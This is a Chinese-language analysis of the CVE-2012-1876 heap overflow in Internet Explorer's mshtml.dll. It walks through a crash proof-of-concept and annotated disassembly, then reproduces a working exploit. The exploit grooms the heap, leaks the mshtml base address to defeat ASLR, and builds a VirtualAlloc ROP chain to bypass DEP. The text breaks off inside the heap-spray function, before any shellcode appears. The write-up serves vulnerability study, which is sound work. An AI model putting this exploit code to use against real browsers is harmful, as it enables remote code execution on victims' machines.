  • CVE_2012_1876堆溢出分析

      首先用WinDbg附加到IE的页面内容(Tab)进程,用 `!gflag +hpa` 开启页堆(page heap):每个堆块尾部紧邻一页不可访问内存,越界写会在第一条越界指令处就触发访问违例,而不是等堆损坏扩散后才崩溃;`.childdbg 1` 允许调试子进程,然后加载POC。注意:页堆是在进程初始化时决定的,在已运行的进程里用 `!gflag +hpa` 设置未必对已有堆生效,若崩溃点不稳定,更可靠的做法是先用 `gflags.exe /i iexplore.exe +hpa` 再启动浏览器。

    POC:

    <html>
     <body>
     <!-- Fixed-layout table with a single <col>; the script below mutates this
          column's width and span after the page has already been laid out. -->
     <table style="table-layout:fixed" >
            <col id="132" width="41" span="1" >&nbsp </col>
     </table>
     <script>
     
     // Trigger for CVE-2012-1876 (heap overflow reached via
     // mshtml!CTableLayout::CalculateMinMax -> CTableColCalc::AdjustForCol).
     // Enlarging the width and then the span of an existing column makes the
     // layout engine recalculate the table with a span far larger than the
     // column array that was sized earlier (see the disassembly analysis).
     function over_trigger() {
            var obj_col = document.getElementById("132");
            // Width value: per the annotation at the GetPixelWidth call in the
            // analysis, it is multiplied by 100 before being stored per column.
            obj_col.width = "42765";
            // Span count drives the per-column calls to AdjustForCol; the write
            // target advances by 0x1C bytes per column index (imul ecx,1Ch).
            obj_col.span = 1000;
     }
     
     // Deferred by a timer; presumably so the initial layout pass (and its
     // allocation) has run before the attributes are changed — not verified here.
     setTimeout("over_trigger();",1);
     </script>
     </body>
     </html>

      附加后断在这个位置,可以看到这里对[EDI]的写操作落在不可写的内存页上而导致崩溃(开启页堆后堆块之后紧邻保护页,越界写会在第一条越界指令处立刻触发访问违例),下面我们分析一下什么地方导致的[EDI]不可写。

      在这个位置栈回溯

      首先从mshtml!CTableColCalc::AdjustForCol开始分析,uf mshtml!CTableColCalc::AdjustForCol

    1:022> uf mshtml!CTableColCalc::AdjustForCol
    mshtml!CTableColCalc::AdjustForCol:
    67ebf152 8bff            mov     edi,edi
    67ebf154 55              push    ebp
    67ebf155 8bec            mov     ebp,esp
    67ebf157 8b08            mov     ecx,dword ptr [eax]
    67ebf159 53              push    ebx
    67ebf15a 8b5d08          mov     ebx,dword ptr [ebp+8]
    67ebf15d 57              push    edi
    67ebf15e 8bc1            mov     eax,ecx
    67ebf160 83e00f          and     eax,0Fh
    67ebf163 8d7e18          lea     edi,[esi+18h]        //这里对edi赋值了
    …以下无用代码省略

      反汇编可以看到mshtml!CTableColCalc::AdjustForCol这个函数只有67ebf163这里对edi进行了赋值,但是mshtml!CTableColCalc::AdjustForCol在对edi赋值之前并没有对esi进行过赋值,所以继续反汇编上层函数mshtml!CTableLayout::CalculateMinMax

      这里我们在IDA里加载符号表分析一下CTableLayout::CalculateMinMax这个函数

    .text:74D3018A                 mov     edi, edi    //巨硬为了INLINE HOOK时方便函数前五字节覆盖做的优化
    .text:74D3018C                 push    ebp
    .text:74D3018D                 mov     ebp, esp
    .text:74D3018F                 sub     esp, 90h    //开辟栈帧
    .text:74D30195                 push    ebx        //栈回溯上层函数,tagSIZE *
    .text:74D30196                 mov     ebx, [ebp+arg_0]        //ebx=参数1=CTableLayout
    .text:74D30199                 push    esi            //栈回溯上层函数,CTableCalcInfo *
    .text:74D3019A                 mov     esi, [ebp+arg_4]        //esi=参数2
    .text:74D3019D                 mov     eax, [esi+28h]
    .text:74D301A0                 mov     [ebp+var_8C], eax
    .text:74D301A6                 mov     eax, [ebx+54h]        //eax=span属性的和
    .text:74D301A9                 mov     [ebp+arg_0], eax
    …省略无用代码
    .text:74D30293 loc_74D30293:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+105↑j
    .text:74D30293                 mov     edx, [ebp+arg_0]        //edx=span属性的和
    .text:74D30296                 mov     eax, edx
    .text:74D30298                 sub     eax, ecx
    .text:74D3029A                 mov     [ebp+var_1C], eax
    .text:74D3029D                 push    0
    .text:74D3029F                 pop     eax
    .text:74D302A0                 setz    al
    .text:74D302A3                 mov     [ebx+50h], ecx
    .text:74D302A6                 shl     eax, 8
    .text:74D302A9                 xor     eax, [ebx+44h]
    .text:74D302AC                 and     eax, 100h
    .text:74D302B1                 xor     [ebx+44h], eax
    .text:74D302B4                 test    byte ptr [esi+2Ch], 1
    .text:74D302B8                 jnz     loc_74C5EE4D
    .text:74D302BE
    .text:74D302BE loc_74D302BE:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)-D133B↑j
    .text:74D302BE                 xor     eax, eax
    .text:74D302C0
    .text:74D302C0 loc_74D302C0:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1957B9↓j
    .text:74D302C0                 or      [ebp+var_38], eax
    .text:74D302C3                 cmp     [ebp+nDenominator], edi
    .text:74D302C6                 jnz     loc_74EC5948
    .text:74D302CC                 mov     eax, [ebx+94h]    //eax=CTableLayout+94H,记为spancmp
    .text:74D302D2                 shr     eax, 2            //eax>>2
    .text:74D302D5                 cmp     eax, edx        //edx=span属性的和,记为spansum
    .text:74D302D7                 jge     short loc_74D30312
    .text:74D302D9                 cmp     edx, edi
    .text:74D302DB                 lea     esi, [ebx+90h]
    .text:74D302E1                 jl      loc_74C2CE82
    .text:74D302E7                 cmp     edx, [esi+8]
    .text:74D302EA                 jbe     short loc_74D302FF
    .text:74D302EC                 push    1Ch             ; Size
    .text:74D302EE                 mov     eax, edx
    .text:74D302F0                 mov     edi, esi
    .text:74D302F2        call    ?EnsureSizeWorker@CImplAry@@AAEJIJ@Z ; CImplAry::EnsureSizeWorker(uint,long)                        //跟进这个函数发现在这里开辟堆空间
    
    .text:74DF8FB7                 mov     edi, edi
    .text:74DF8FB9                 push    ebp
    .text:74DF8FBA                 mov     ebp, esp
    .text:74DF8FBC                 push    ecx
    .text:74DF8FBD                 push    ecx
    .text:74DF8FBE                 push    ebx
    .text:74DF8FBF                 push    esi
    .text:74DF8FC0                 mov     esi, eax
    .text:74DF8FC2                 push    4
    .text:74DF8FC4                 pop     eax
    .text:74DF8FC5                 mov     [ebp+var_4], eax
    .text:74DF8FC8                 cmp     esi, eax
    .text:74DF8FCA                 jnb     loc_74E02CB4
    .text:74DF8FD0
    .text:74DF8FD0 loc_74DF8FD0:                           ; CODE XREF: CImplAry::EnsureSizeWorker(uint,long)+9D00↓j
    .text:74DF8FD0                                         ; CImplAry::EnsureSizeWorker(uint,long)+9D25↓j ...
    .text:74DF8FD0                 mov     eax, [ebp+var_4]        //eax=4
    .text:74DF8FD3                 mul     [ebp+Size]            //Size*4,Size至少0X1C
    .text:74DF8FD6                 push    edx
    .text:74DF8FD7                 push    eax
    .text:74DF8FD8                 lea     eax, [ebp+dwBytes]
    .text:74DF8FDB                 call    ?ULongLongToUInt@@YGJ_KPAI@Z ; ULongLongToUInt(unsigned __int64,uint *)
    .text:74DF8FE0                 mov     ebx, eax
    .text:74DF8FE2                 test    ebx, ebx
    .text:74DF8FE4                 jnz     short loc_74DF900B
    .text:74DF8FE6                 test    byte ptr [edi+4], 2
    .text:74DF8FEA                 jnz     loc_74E3BEEC
    .text:74DF8FF0                 push    [ebp+dwBytes]   ; dwBytes
    .text:74DF8FF3                 lea     esi, [edi+0Ch]        //esi=CTableLayout+0x90+0xC,HeapRealloc返回的地址,记为vulheap
    .text:74DF8FF6                 call    ?_HeapRealloc@@YGJPAPAXI@Z ; _HeapRealloc(void * *,uint)
    
    上面代码段的逻辑是:先比较 (spancmp>>2) 与 spansum,只有 (spancmp>>2) < spansum 时才继续;接着在 74D302E7/74D302EA 处把 spansum 与数组当前容量 [esi+8] 比较,只有 spansum 大于现有容量才调用 CImplAry::EnsureSizeWorker(元素大小 0x1C)重新分配漏洞堆空间,否则沿用原来的堆块。EnsureSizeWorker 列出的路径里 dwBytes = 元素个数 × 0x1C(元素个数小于 4 时按 4 个分配;大于等于 4 的分支在 74E02CB4,此处未列出)。堆块指针保存在 CTableLayout+0x90+0xC:74DF8FF3 处的 lea esi,[edi+0Ch] 取的是这个指针槽的地址,作为 void** 传给 _HeapRealloc,重分配后的堆块地址被写回此处,后面 74EC5B4F 处通过 [ebx+9Ch] 读取的就是它(记为 vulheap)。
    
    .text:74EC5AB0                 push    0
    .text:74EC5AB2                 push    esi
    .text:74EC5AB3                 call    ?GetPixelWidth@CWidthUnitValue@@QBEHPBVCDocInfo@@PAVCElement@@H@Z ; CWidthUnitValue::GetPixelWidth(CDocInfo const *,CElement *,int)
    .text:74EC5AB8                 cmp     [ebp+var_5C], 0
    .text:74EC5ABC                 mov     [ebp+var_2C], eax    //copydata=width*100
    …省略无用代码
    .text:74EC5B3E                 mov     eax, [ebp+nDenominator]        //span=1000
    .text:74EC5B41                 imul    ecx, 1Ch    
    .text:74EC5B44                 add     [ebp+var_38], eax
    .text:74EC5B47                 mov     [ebp+var_20], ecx
    .text:74EC5B4A                 jmp     short loc_74EC5B4F
    .text:74EC5B4C ; ---------------------------------------------------------------------------
    .text:74EC5B4C
    .text:74EC5B4C loc_74EC5B4C:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+195A11↓j
    .text:74EC5B4C                 mov     ecx, [ebp+var_20]
    .text:74EC5B4F
    .text:74EC5B4F loc_74EC5B4F:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1959C0↑j
    .text:74EC5B4F                 mov     eax, [ebx+9Ch]        //eax=vulheap
    .text:74EC5B55                 add     eax, ecx        //eax=vulheap+span*0x1c
    .text:74EC5B57                 cmp     [ebp+var_1C], 0
    .text:74EC5B5B                 mov     [ebp+var_24], eax
    .text:74EC5B5E                 jz      short loc_74EC5B7A
    .text:74EC5B60                 mov     eax, [ebp+nDenominator]
    .text:74EC5B63                 cmp     eax, 1
    .text:74EC5B66                 jle     short loc_74EC5B7A
    .text:74EC5B68                 dec     eax
    .text:74EC5B69                 cmp     [ebp+var_14], eax
    .text:74EC5B6C                 jnz     short loc_74EC5B7A
    .text:74EC5B6E                 imul    eax, [ebp+var_C]
    .text:74EC5B72                 mov     ecx, [ebp+var_2C]    //ecx=copydata
    .text:74EC5B75                 sub     ecx, eax
    .text:74EC5B77                 mov     [ebp+var_C], ecx        //[ebp-c]=span*0x1c
    .text:74EC5B7A
    .text:74EC5B7A loc_74EC5B7A:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1959D4↑j
    .text:74EC5B7A                                         ; CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1959DC↑j ...
    .text:74EC5B7A                 push    [ebp+var_3C]
    .text:74EC5B7D                 mov     eax, [ebp+var_34]
    .text:74EC5B80                 push    [ebp+arg_4]
    .text:74EC5B83                 mov     esi, [ebp+var_24]    
    .text:74EC5B86                 push    [ebp+var_C]            //copydata
    .text:74EC5B89                 call    ?AdjustForCol@CTableColCalc@@QAEXPBVCWidthUnitValue@@HPAVCCalcInfo@@H@Z ; CTableColCalc::AdjustForCol(CWidthUnitValue const *,int,CCalcInfo *,int)

      这里我们继续查看一下AdjustForCol这个函数

      这里的推断是:AdjustForCol 以 EAX 的内容按位与 0xF 的结果作为循环次数,依次把 CWidthUnitValue *a4 的内容复制到 esi 指向的位置,最终导致溢出。需要说明的是上面 AdjustForCol 的反汇编省略了大半,从列出的指令只能确认两点:`and eax,0Fh` 取的是 [eax](CWidthUnitValue 的第一个 DWORD)的低 4 位,以及写入目标 edi = esi+0x18;而 esi 来自调用者传入的 [ebp+var_24] = vulheap + 索引×0x1C(74EC5B4F~74EC5B83)。也就是说每调用一次 AdjustForCol 就向 vulheap 之后 0x1C 的整数倍处写入,当调用次数(由 span=1000 驱动)超过 EnsureSizeWorker 实际分配的元素个数时,写入就越过堆块末尾,在页堆下直接命中保护页而崩溃。循环次数与分配大小为何不一致,需要对照完整的 CalculateMinMax 才能确认,此处列出的片段不足以证实。

     

    这几天心态有点崩,VUPEN的EXP详细分析先放着吧,需要绕过ASLR和DEP。大致思路是利用堆溢出读取CButtonLayout的虚表指针,这个虚表指针和漏洞DLL基址的差是一个固定值(EXP 中为 0x1582b8,见 over_trigger 里的 `leak_addr - Number(0x001582b8)`),所以这样可以绕过ASLR(至于CButtonLayout本身处于堆空间,也受ASLR影响,我们可以得到这个指针值的原因是CButtonLayout位于Vulheap的固定偏移处,这个偏移量是0X300+8*3+4,即3个0X100的堆块+3个块首大小+4字节虚表指针)。需要注意这个偏移和下面 ROP 链里的所有 gadget 偏移都只对某一个特定版本的 mshtml.dll 有效(EXP 注释 "generated with mona.py (mshtml.dll v)" 里的版本号已经缺失),换一个补丁版本就要重新计算。DEP的绕过是构造一个ROP链调用修改内存属性的API:原文写的是VirtualProtect,但下面给出的EXP中mona生成的链实际调用的是VirtualAlloc(见注释 `ptr to &VirtualAlloc() [IAT]`,参数 0x1000=MEM_COMMIT、0x40=PAGE_EXECUTE_READWRITE),两者思路一致,都是先把ROP链之后shellcode所在的内存变为可执行。然后再通过堆喷射把ROP链和SHELLCODE喷射到可预测地址,smash_vtable 把虚表指针覆盖为 0x07070024(width 1178993×100,按EXP注释这是喷射区域内的地址)。

    关于里边详细的原理等变强了有时间再补吧。。

    深深的感慨漏洞利用的艺术,学无止境,现在真的还太菜

            <html>
            <body>
            <div id="test"></div>
            <script language='javascript'>
                    
            var leak_index = -1;   // index into arr[] of the string whose BSTR length got overwritten; set by over_trigger
    
            // Three filler patterns, each grown by doubling until >= 480 chars so
            // that 125-char substrings can be cut from them below.
            var dap = "EEEE";
            while ( dap.length < 480 ) dap += dap;
    
            var padding = "AAAA";
            while ( padding.length < 480 ) padding += padding;
    
            var filler = "BBBB";
            while ( filler.length < 480 ) filler += filler;
    
            //spray
            // arr holds the strings that are later scanned for a corrupted length
            // field; rra holds the strings that get freed to punch holes.
            var arr = new Array();
            var rra = new Array();
    
            var div_container = document.getElementById("test");
            div_container.style.cssText = "display:none";
    
            // Each iteration allocates, in order: one 'E' string, one 'A' string,
            // one 'B' string and one <button> element. (0x100-6)/2 = 125 UTF-16
            // chars; together with the 4-byte BSTR length prefix and 2-byte
            // terminator that is presumably a 0x100-byte heap allocation, so the
            // objects interleave at a predictable granularity — confirm against
            // the heap in a debugger.
            for (var i=0; i < 500; i+=2) {
    
                // E
                rra[i] = dap.substring(0, (0x100-6)/2);
    
                // S, bstr = A
                arr[i] = padding.substring(0, (0x100-6)/2);
    
                // A, bstr = B
                arr[i+1] = filler.substring(0, (0x100-6)/2);
    
                // B
                var obj = document.createElement("button");
                div_container.appendChild(obj);
    
            }
    
            // Drop every 'E' string in the upper part of the spray and force a
            // JScript GC (CollectGarbage is IE-specific) after each one, leaving
            // holes between the surviving A/B strings and buttons; the write-up
            // expects the vulnerable column array to land next to a button's
            // CButtonLayout at a fixed offset.
            for (var i=200; i<500; i+=2 ) {
                rra[i] = null;
                CollectGarbage();
            }
    
            </script>
            <table style="table-layout:fixed" ><col id="0" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="1" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="2" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="3" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="4" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="5" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="6" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="7" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="8" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="9" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="10" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="11" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="12" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="13" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="14" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="15" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="16" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="17" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="18" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="19" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="20" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="21" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col 
id="22" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="23" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="24" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="25" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="26" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="27" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="28" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="29" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="30" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="31" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="32" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="33" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="34" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="35" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="36" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="37" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="38" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="39" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="40" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="41" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="42" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="43" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="44" width="41" span="9" >&nbsp 
</col></table><table style="table-layout:fixed" ><col id="45" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="46" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="47" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="48" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="49" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="50" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="51" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="52" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="53" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="54" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="55" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="56" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="57" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="58" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="59" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="60" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="61" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="62" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="63" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="64" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="65" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="66" width="41" span="9" >&nbsp </col></table><table 
style="table-layout:fixed" ><col id="67" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="68" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="69" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="70" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="71" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="72" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="73" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="74" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="75" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="76" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="77" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="78" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="79" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="80" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="81" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="82" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="83" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="84" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="85" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="86" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="87" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="88" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="89" 
width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="90" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="91" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="92" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="93" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="94" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="95" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="96" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="97" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="98" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="99" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="100" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="101" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="102" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="103" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="104" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="105" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="106" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="107" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="108" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="109" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="110" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="111" width="41" span="9" >&nbsp 
</col></table><table style="table-layout:fixed" ><col id="112" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="113" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="114" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="115" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="116" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="117" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="118" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="119" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="120" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="121" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="122" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="123" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="124" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="125" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="126" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="127" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="128" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="129" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="130" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="131" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="132" width="41" span="9" >&nbsp </col></table>
            
            <script language='javascript'>
                // Runs synchronously during parsing, before any of the timers:
                // raise the trigger column (last of the tables above) from span=9
                // to span=19. Presumably this reallocates its column array into the
                // holes left by the spray and performs the first overrun that
                // over_trigger then looks for — verify in a debugger.
                var obj_col = document.getElementById("132");
                obj_col.span = 19;
        
            // Info-leak stage (first timer). By the time this runs the only
            // mutation that has happened is span=19 on column 132, so that change
            // is presumably what overwrote the BSTR length field of one of the
            // sprayed strings: its .length now exceeds the 125 chars it was
            // created with, and substring() can read past its original end.
            function over_trigger() {
                var leak_addr = -1;
                for ( var i = 0; i < 500; i++ ) {
                    if ( arr[i].length > (0x100-6)/2 ) { // overflowed
                        leak_index = i;
                        // Skip the 2-byte BSTR terminator plus 8 more bytes (the
                        // write-up treats these as the next chunk's header), then
                        // take 2 UTF-16 units = 4 bytes.
                        var leak = arr[i].substring((0x100-6)/2+(2+8)/2, (0x100-6)/2+(2+8+4)/2);
                        // Little-endian reassembly: unit 1 is the high half, unit 0 the low.
                        // NOTE(review): toString(16) is not zero-padded, so this is only
                        // correct when both halves are >= 0x1000 — true for a DLL
                        // address here, but fragile in general.
                        leak_addr = parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 );
                        // The leaked value is a vtable pointer inside mshtml.dll; its
                        // distance from the module base (0x1582b8) is build-specific.
                        mshtmlbase = leak_addr - Number(0x001582b8);
                        alert(mshtmlbase);
                        break;
                    }
                }
                if ( leak_addr == -1 || leak_index == -1 ) { alert("memory leak failed...."); }
            //return mshtmlbase;
            }
    
        // A very special heap spray
        function heap_spray(){
               CollectGarbage();   // start the spray from a freshly collected heap
            var heapobj = new Object();   // carrier for the helper functions below, so tab2uni can call d2u through it
        
            // generated with mona.py (mshtml.dll v)
                // ROP chain for the DEP bypass, generated by mona.py for one specific
                // mshtml.dll build (the version in the original comment is missing;
                // every offset below is tied to it). It follows mona's standard pushad
                // layout: load VirtualAlloc's IAT entry into esi, a "jmp esp" into ebp
                // and the call arguments into ebx/edx/ecx, then pushad+retn so that
                // VirtualAlloc(lpAddress=esp, dwSize=1, flAllocationType=0x1000
                // MEM_COMMIT, flProtect=0x40 PAGE_EXECUTE_READWRITE) runs and returns
                // into jmp esp. NOTE(review): the write-up above says VirtualProtect;
                // the chain as listed targets VirtualAlloc.
                // The local `arr` shadows the global spray array of the same name —
                // harmless (function scope) but easy to misread.
                function rop_chain(mshtmlbase){
                    var arr = [
                    mshtmlbase + Number(0x00001031),    // no annotation in the original; presumably the entry the smashed vtable dispatches to — not verified
                    mshtmlbase + Number(0x00002c78),    // pop ebp; retn
                    mshtmlbase + Number(0x0001b4e3),    // xchg eax,esp; retn (pivot)
                    mshtmlbase + Number(0x00352c8b),    // pop eax; retn
                    mshtmlbase + Number(0x00001340),    // ptr to &VirtualAlloc() [IAT]
                    mshtmlbase + Number(0x00124ade),    // mov eax,[eax]; retn  -> eax = VirtualAlloc
                    mshtmlbase + Number(0x000af93e),    // xchg eax,esi; and al,0; xor eax,eax; retn  -> esi = VirtualAlloc
                    mshtmlbase + Number(0x00455a9c),    // pop ebp; retn
                    mshtmlbase + Number(0x00128b8d),    // & jmp esp  -> ebp (return address after VirtualAlloc)
                    mshtmlbase + Number(0x00061436),    // pop ebx; retn
                    0x00000001,                       // 0x00000001-> ebx (dwSize)
                    mshtmlbase + Number(0x0052d8a3),    // pop edx; retn
                    0x00001000,                       // 0x00001000-> edx (MEM_COMMIT)
                    mshtmlbase + Number(0x00003670),    // pop ecx; retn
                    0x00000040,                       // 0x00000040-> ecx (PAGE_EXECUTE_READWRITE)
                    mshtmlbase + Number(0x001d263d),    // pop edi; retn
                    mshtmlbase + Number(0x000032ac),    // retn  -> edi (first thing executed after pushad)
                    mshtmlbase + Number(0x00352c9f),    // pop eax; retn
                    0x90909090,                       // nop  -> eax
                    mshtmlbase + Number(0x0052e805),    // pushad; retn
                    0x90909090,                       // NOP sled; the decoded shellcode is appended right after the chain
                    0x90909090,
                    0x90909090,
                    0x90909090,
                    0x90909090,
                        ];
                    return arr;
                }
    
            // Pack one 32-bit value into two UTF-16 code units, low half first, so
            // that the resulting string's memory image is the little-endian dword.
            // fromCharCode truncates to 16 bits, so the sign introduced by >> on
            // values >= 0x80000000 does not matter.
            function d2u(dword){
                var uni = String.fromCharCode(dword & 0xFFFF);
                uni += String.fromCharCode(dword>>16);
                return uni;
            }
    
            // Concatenate an array of dwords into one string via heapobj.d2u, i.e.
            // serialise the ROP chain into the byte layout it must have in memory.
            function tab2uni(heapobj, tab){
                var uni = ""
                for(var i=0;i<tab.length;i++){
                    uni += heapobj.d2u(tab[i]);
                }
                return uni;
            }
            
            // Attach the helpers to the carrier object; the calls below go through
            // heapobj.* rather than the bare function names.
            heapobj.tab2uni = tab2uni;
            heapobj.d2u = d2u;
            heapobj.rop_chain = rop_chain;
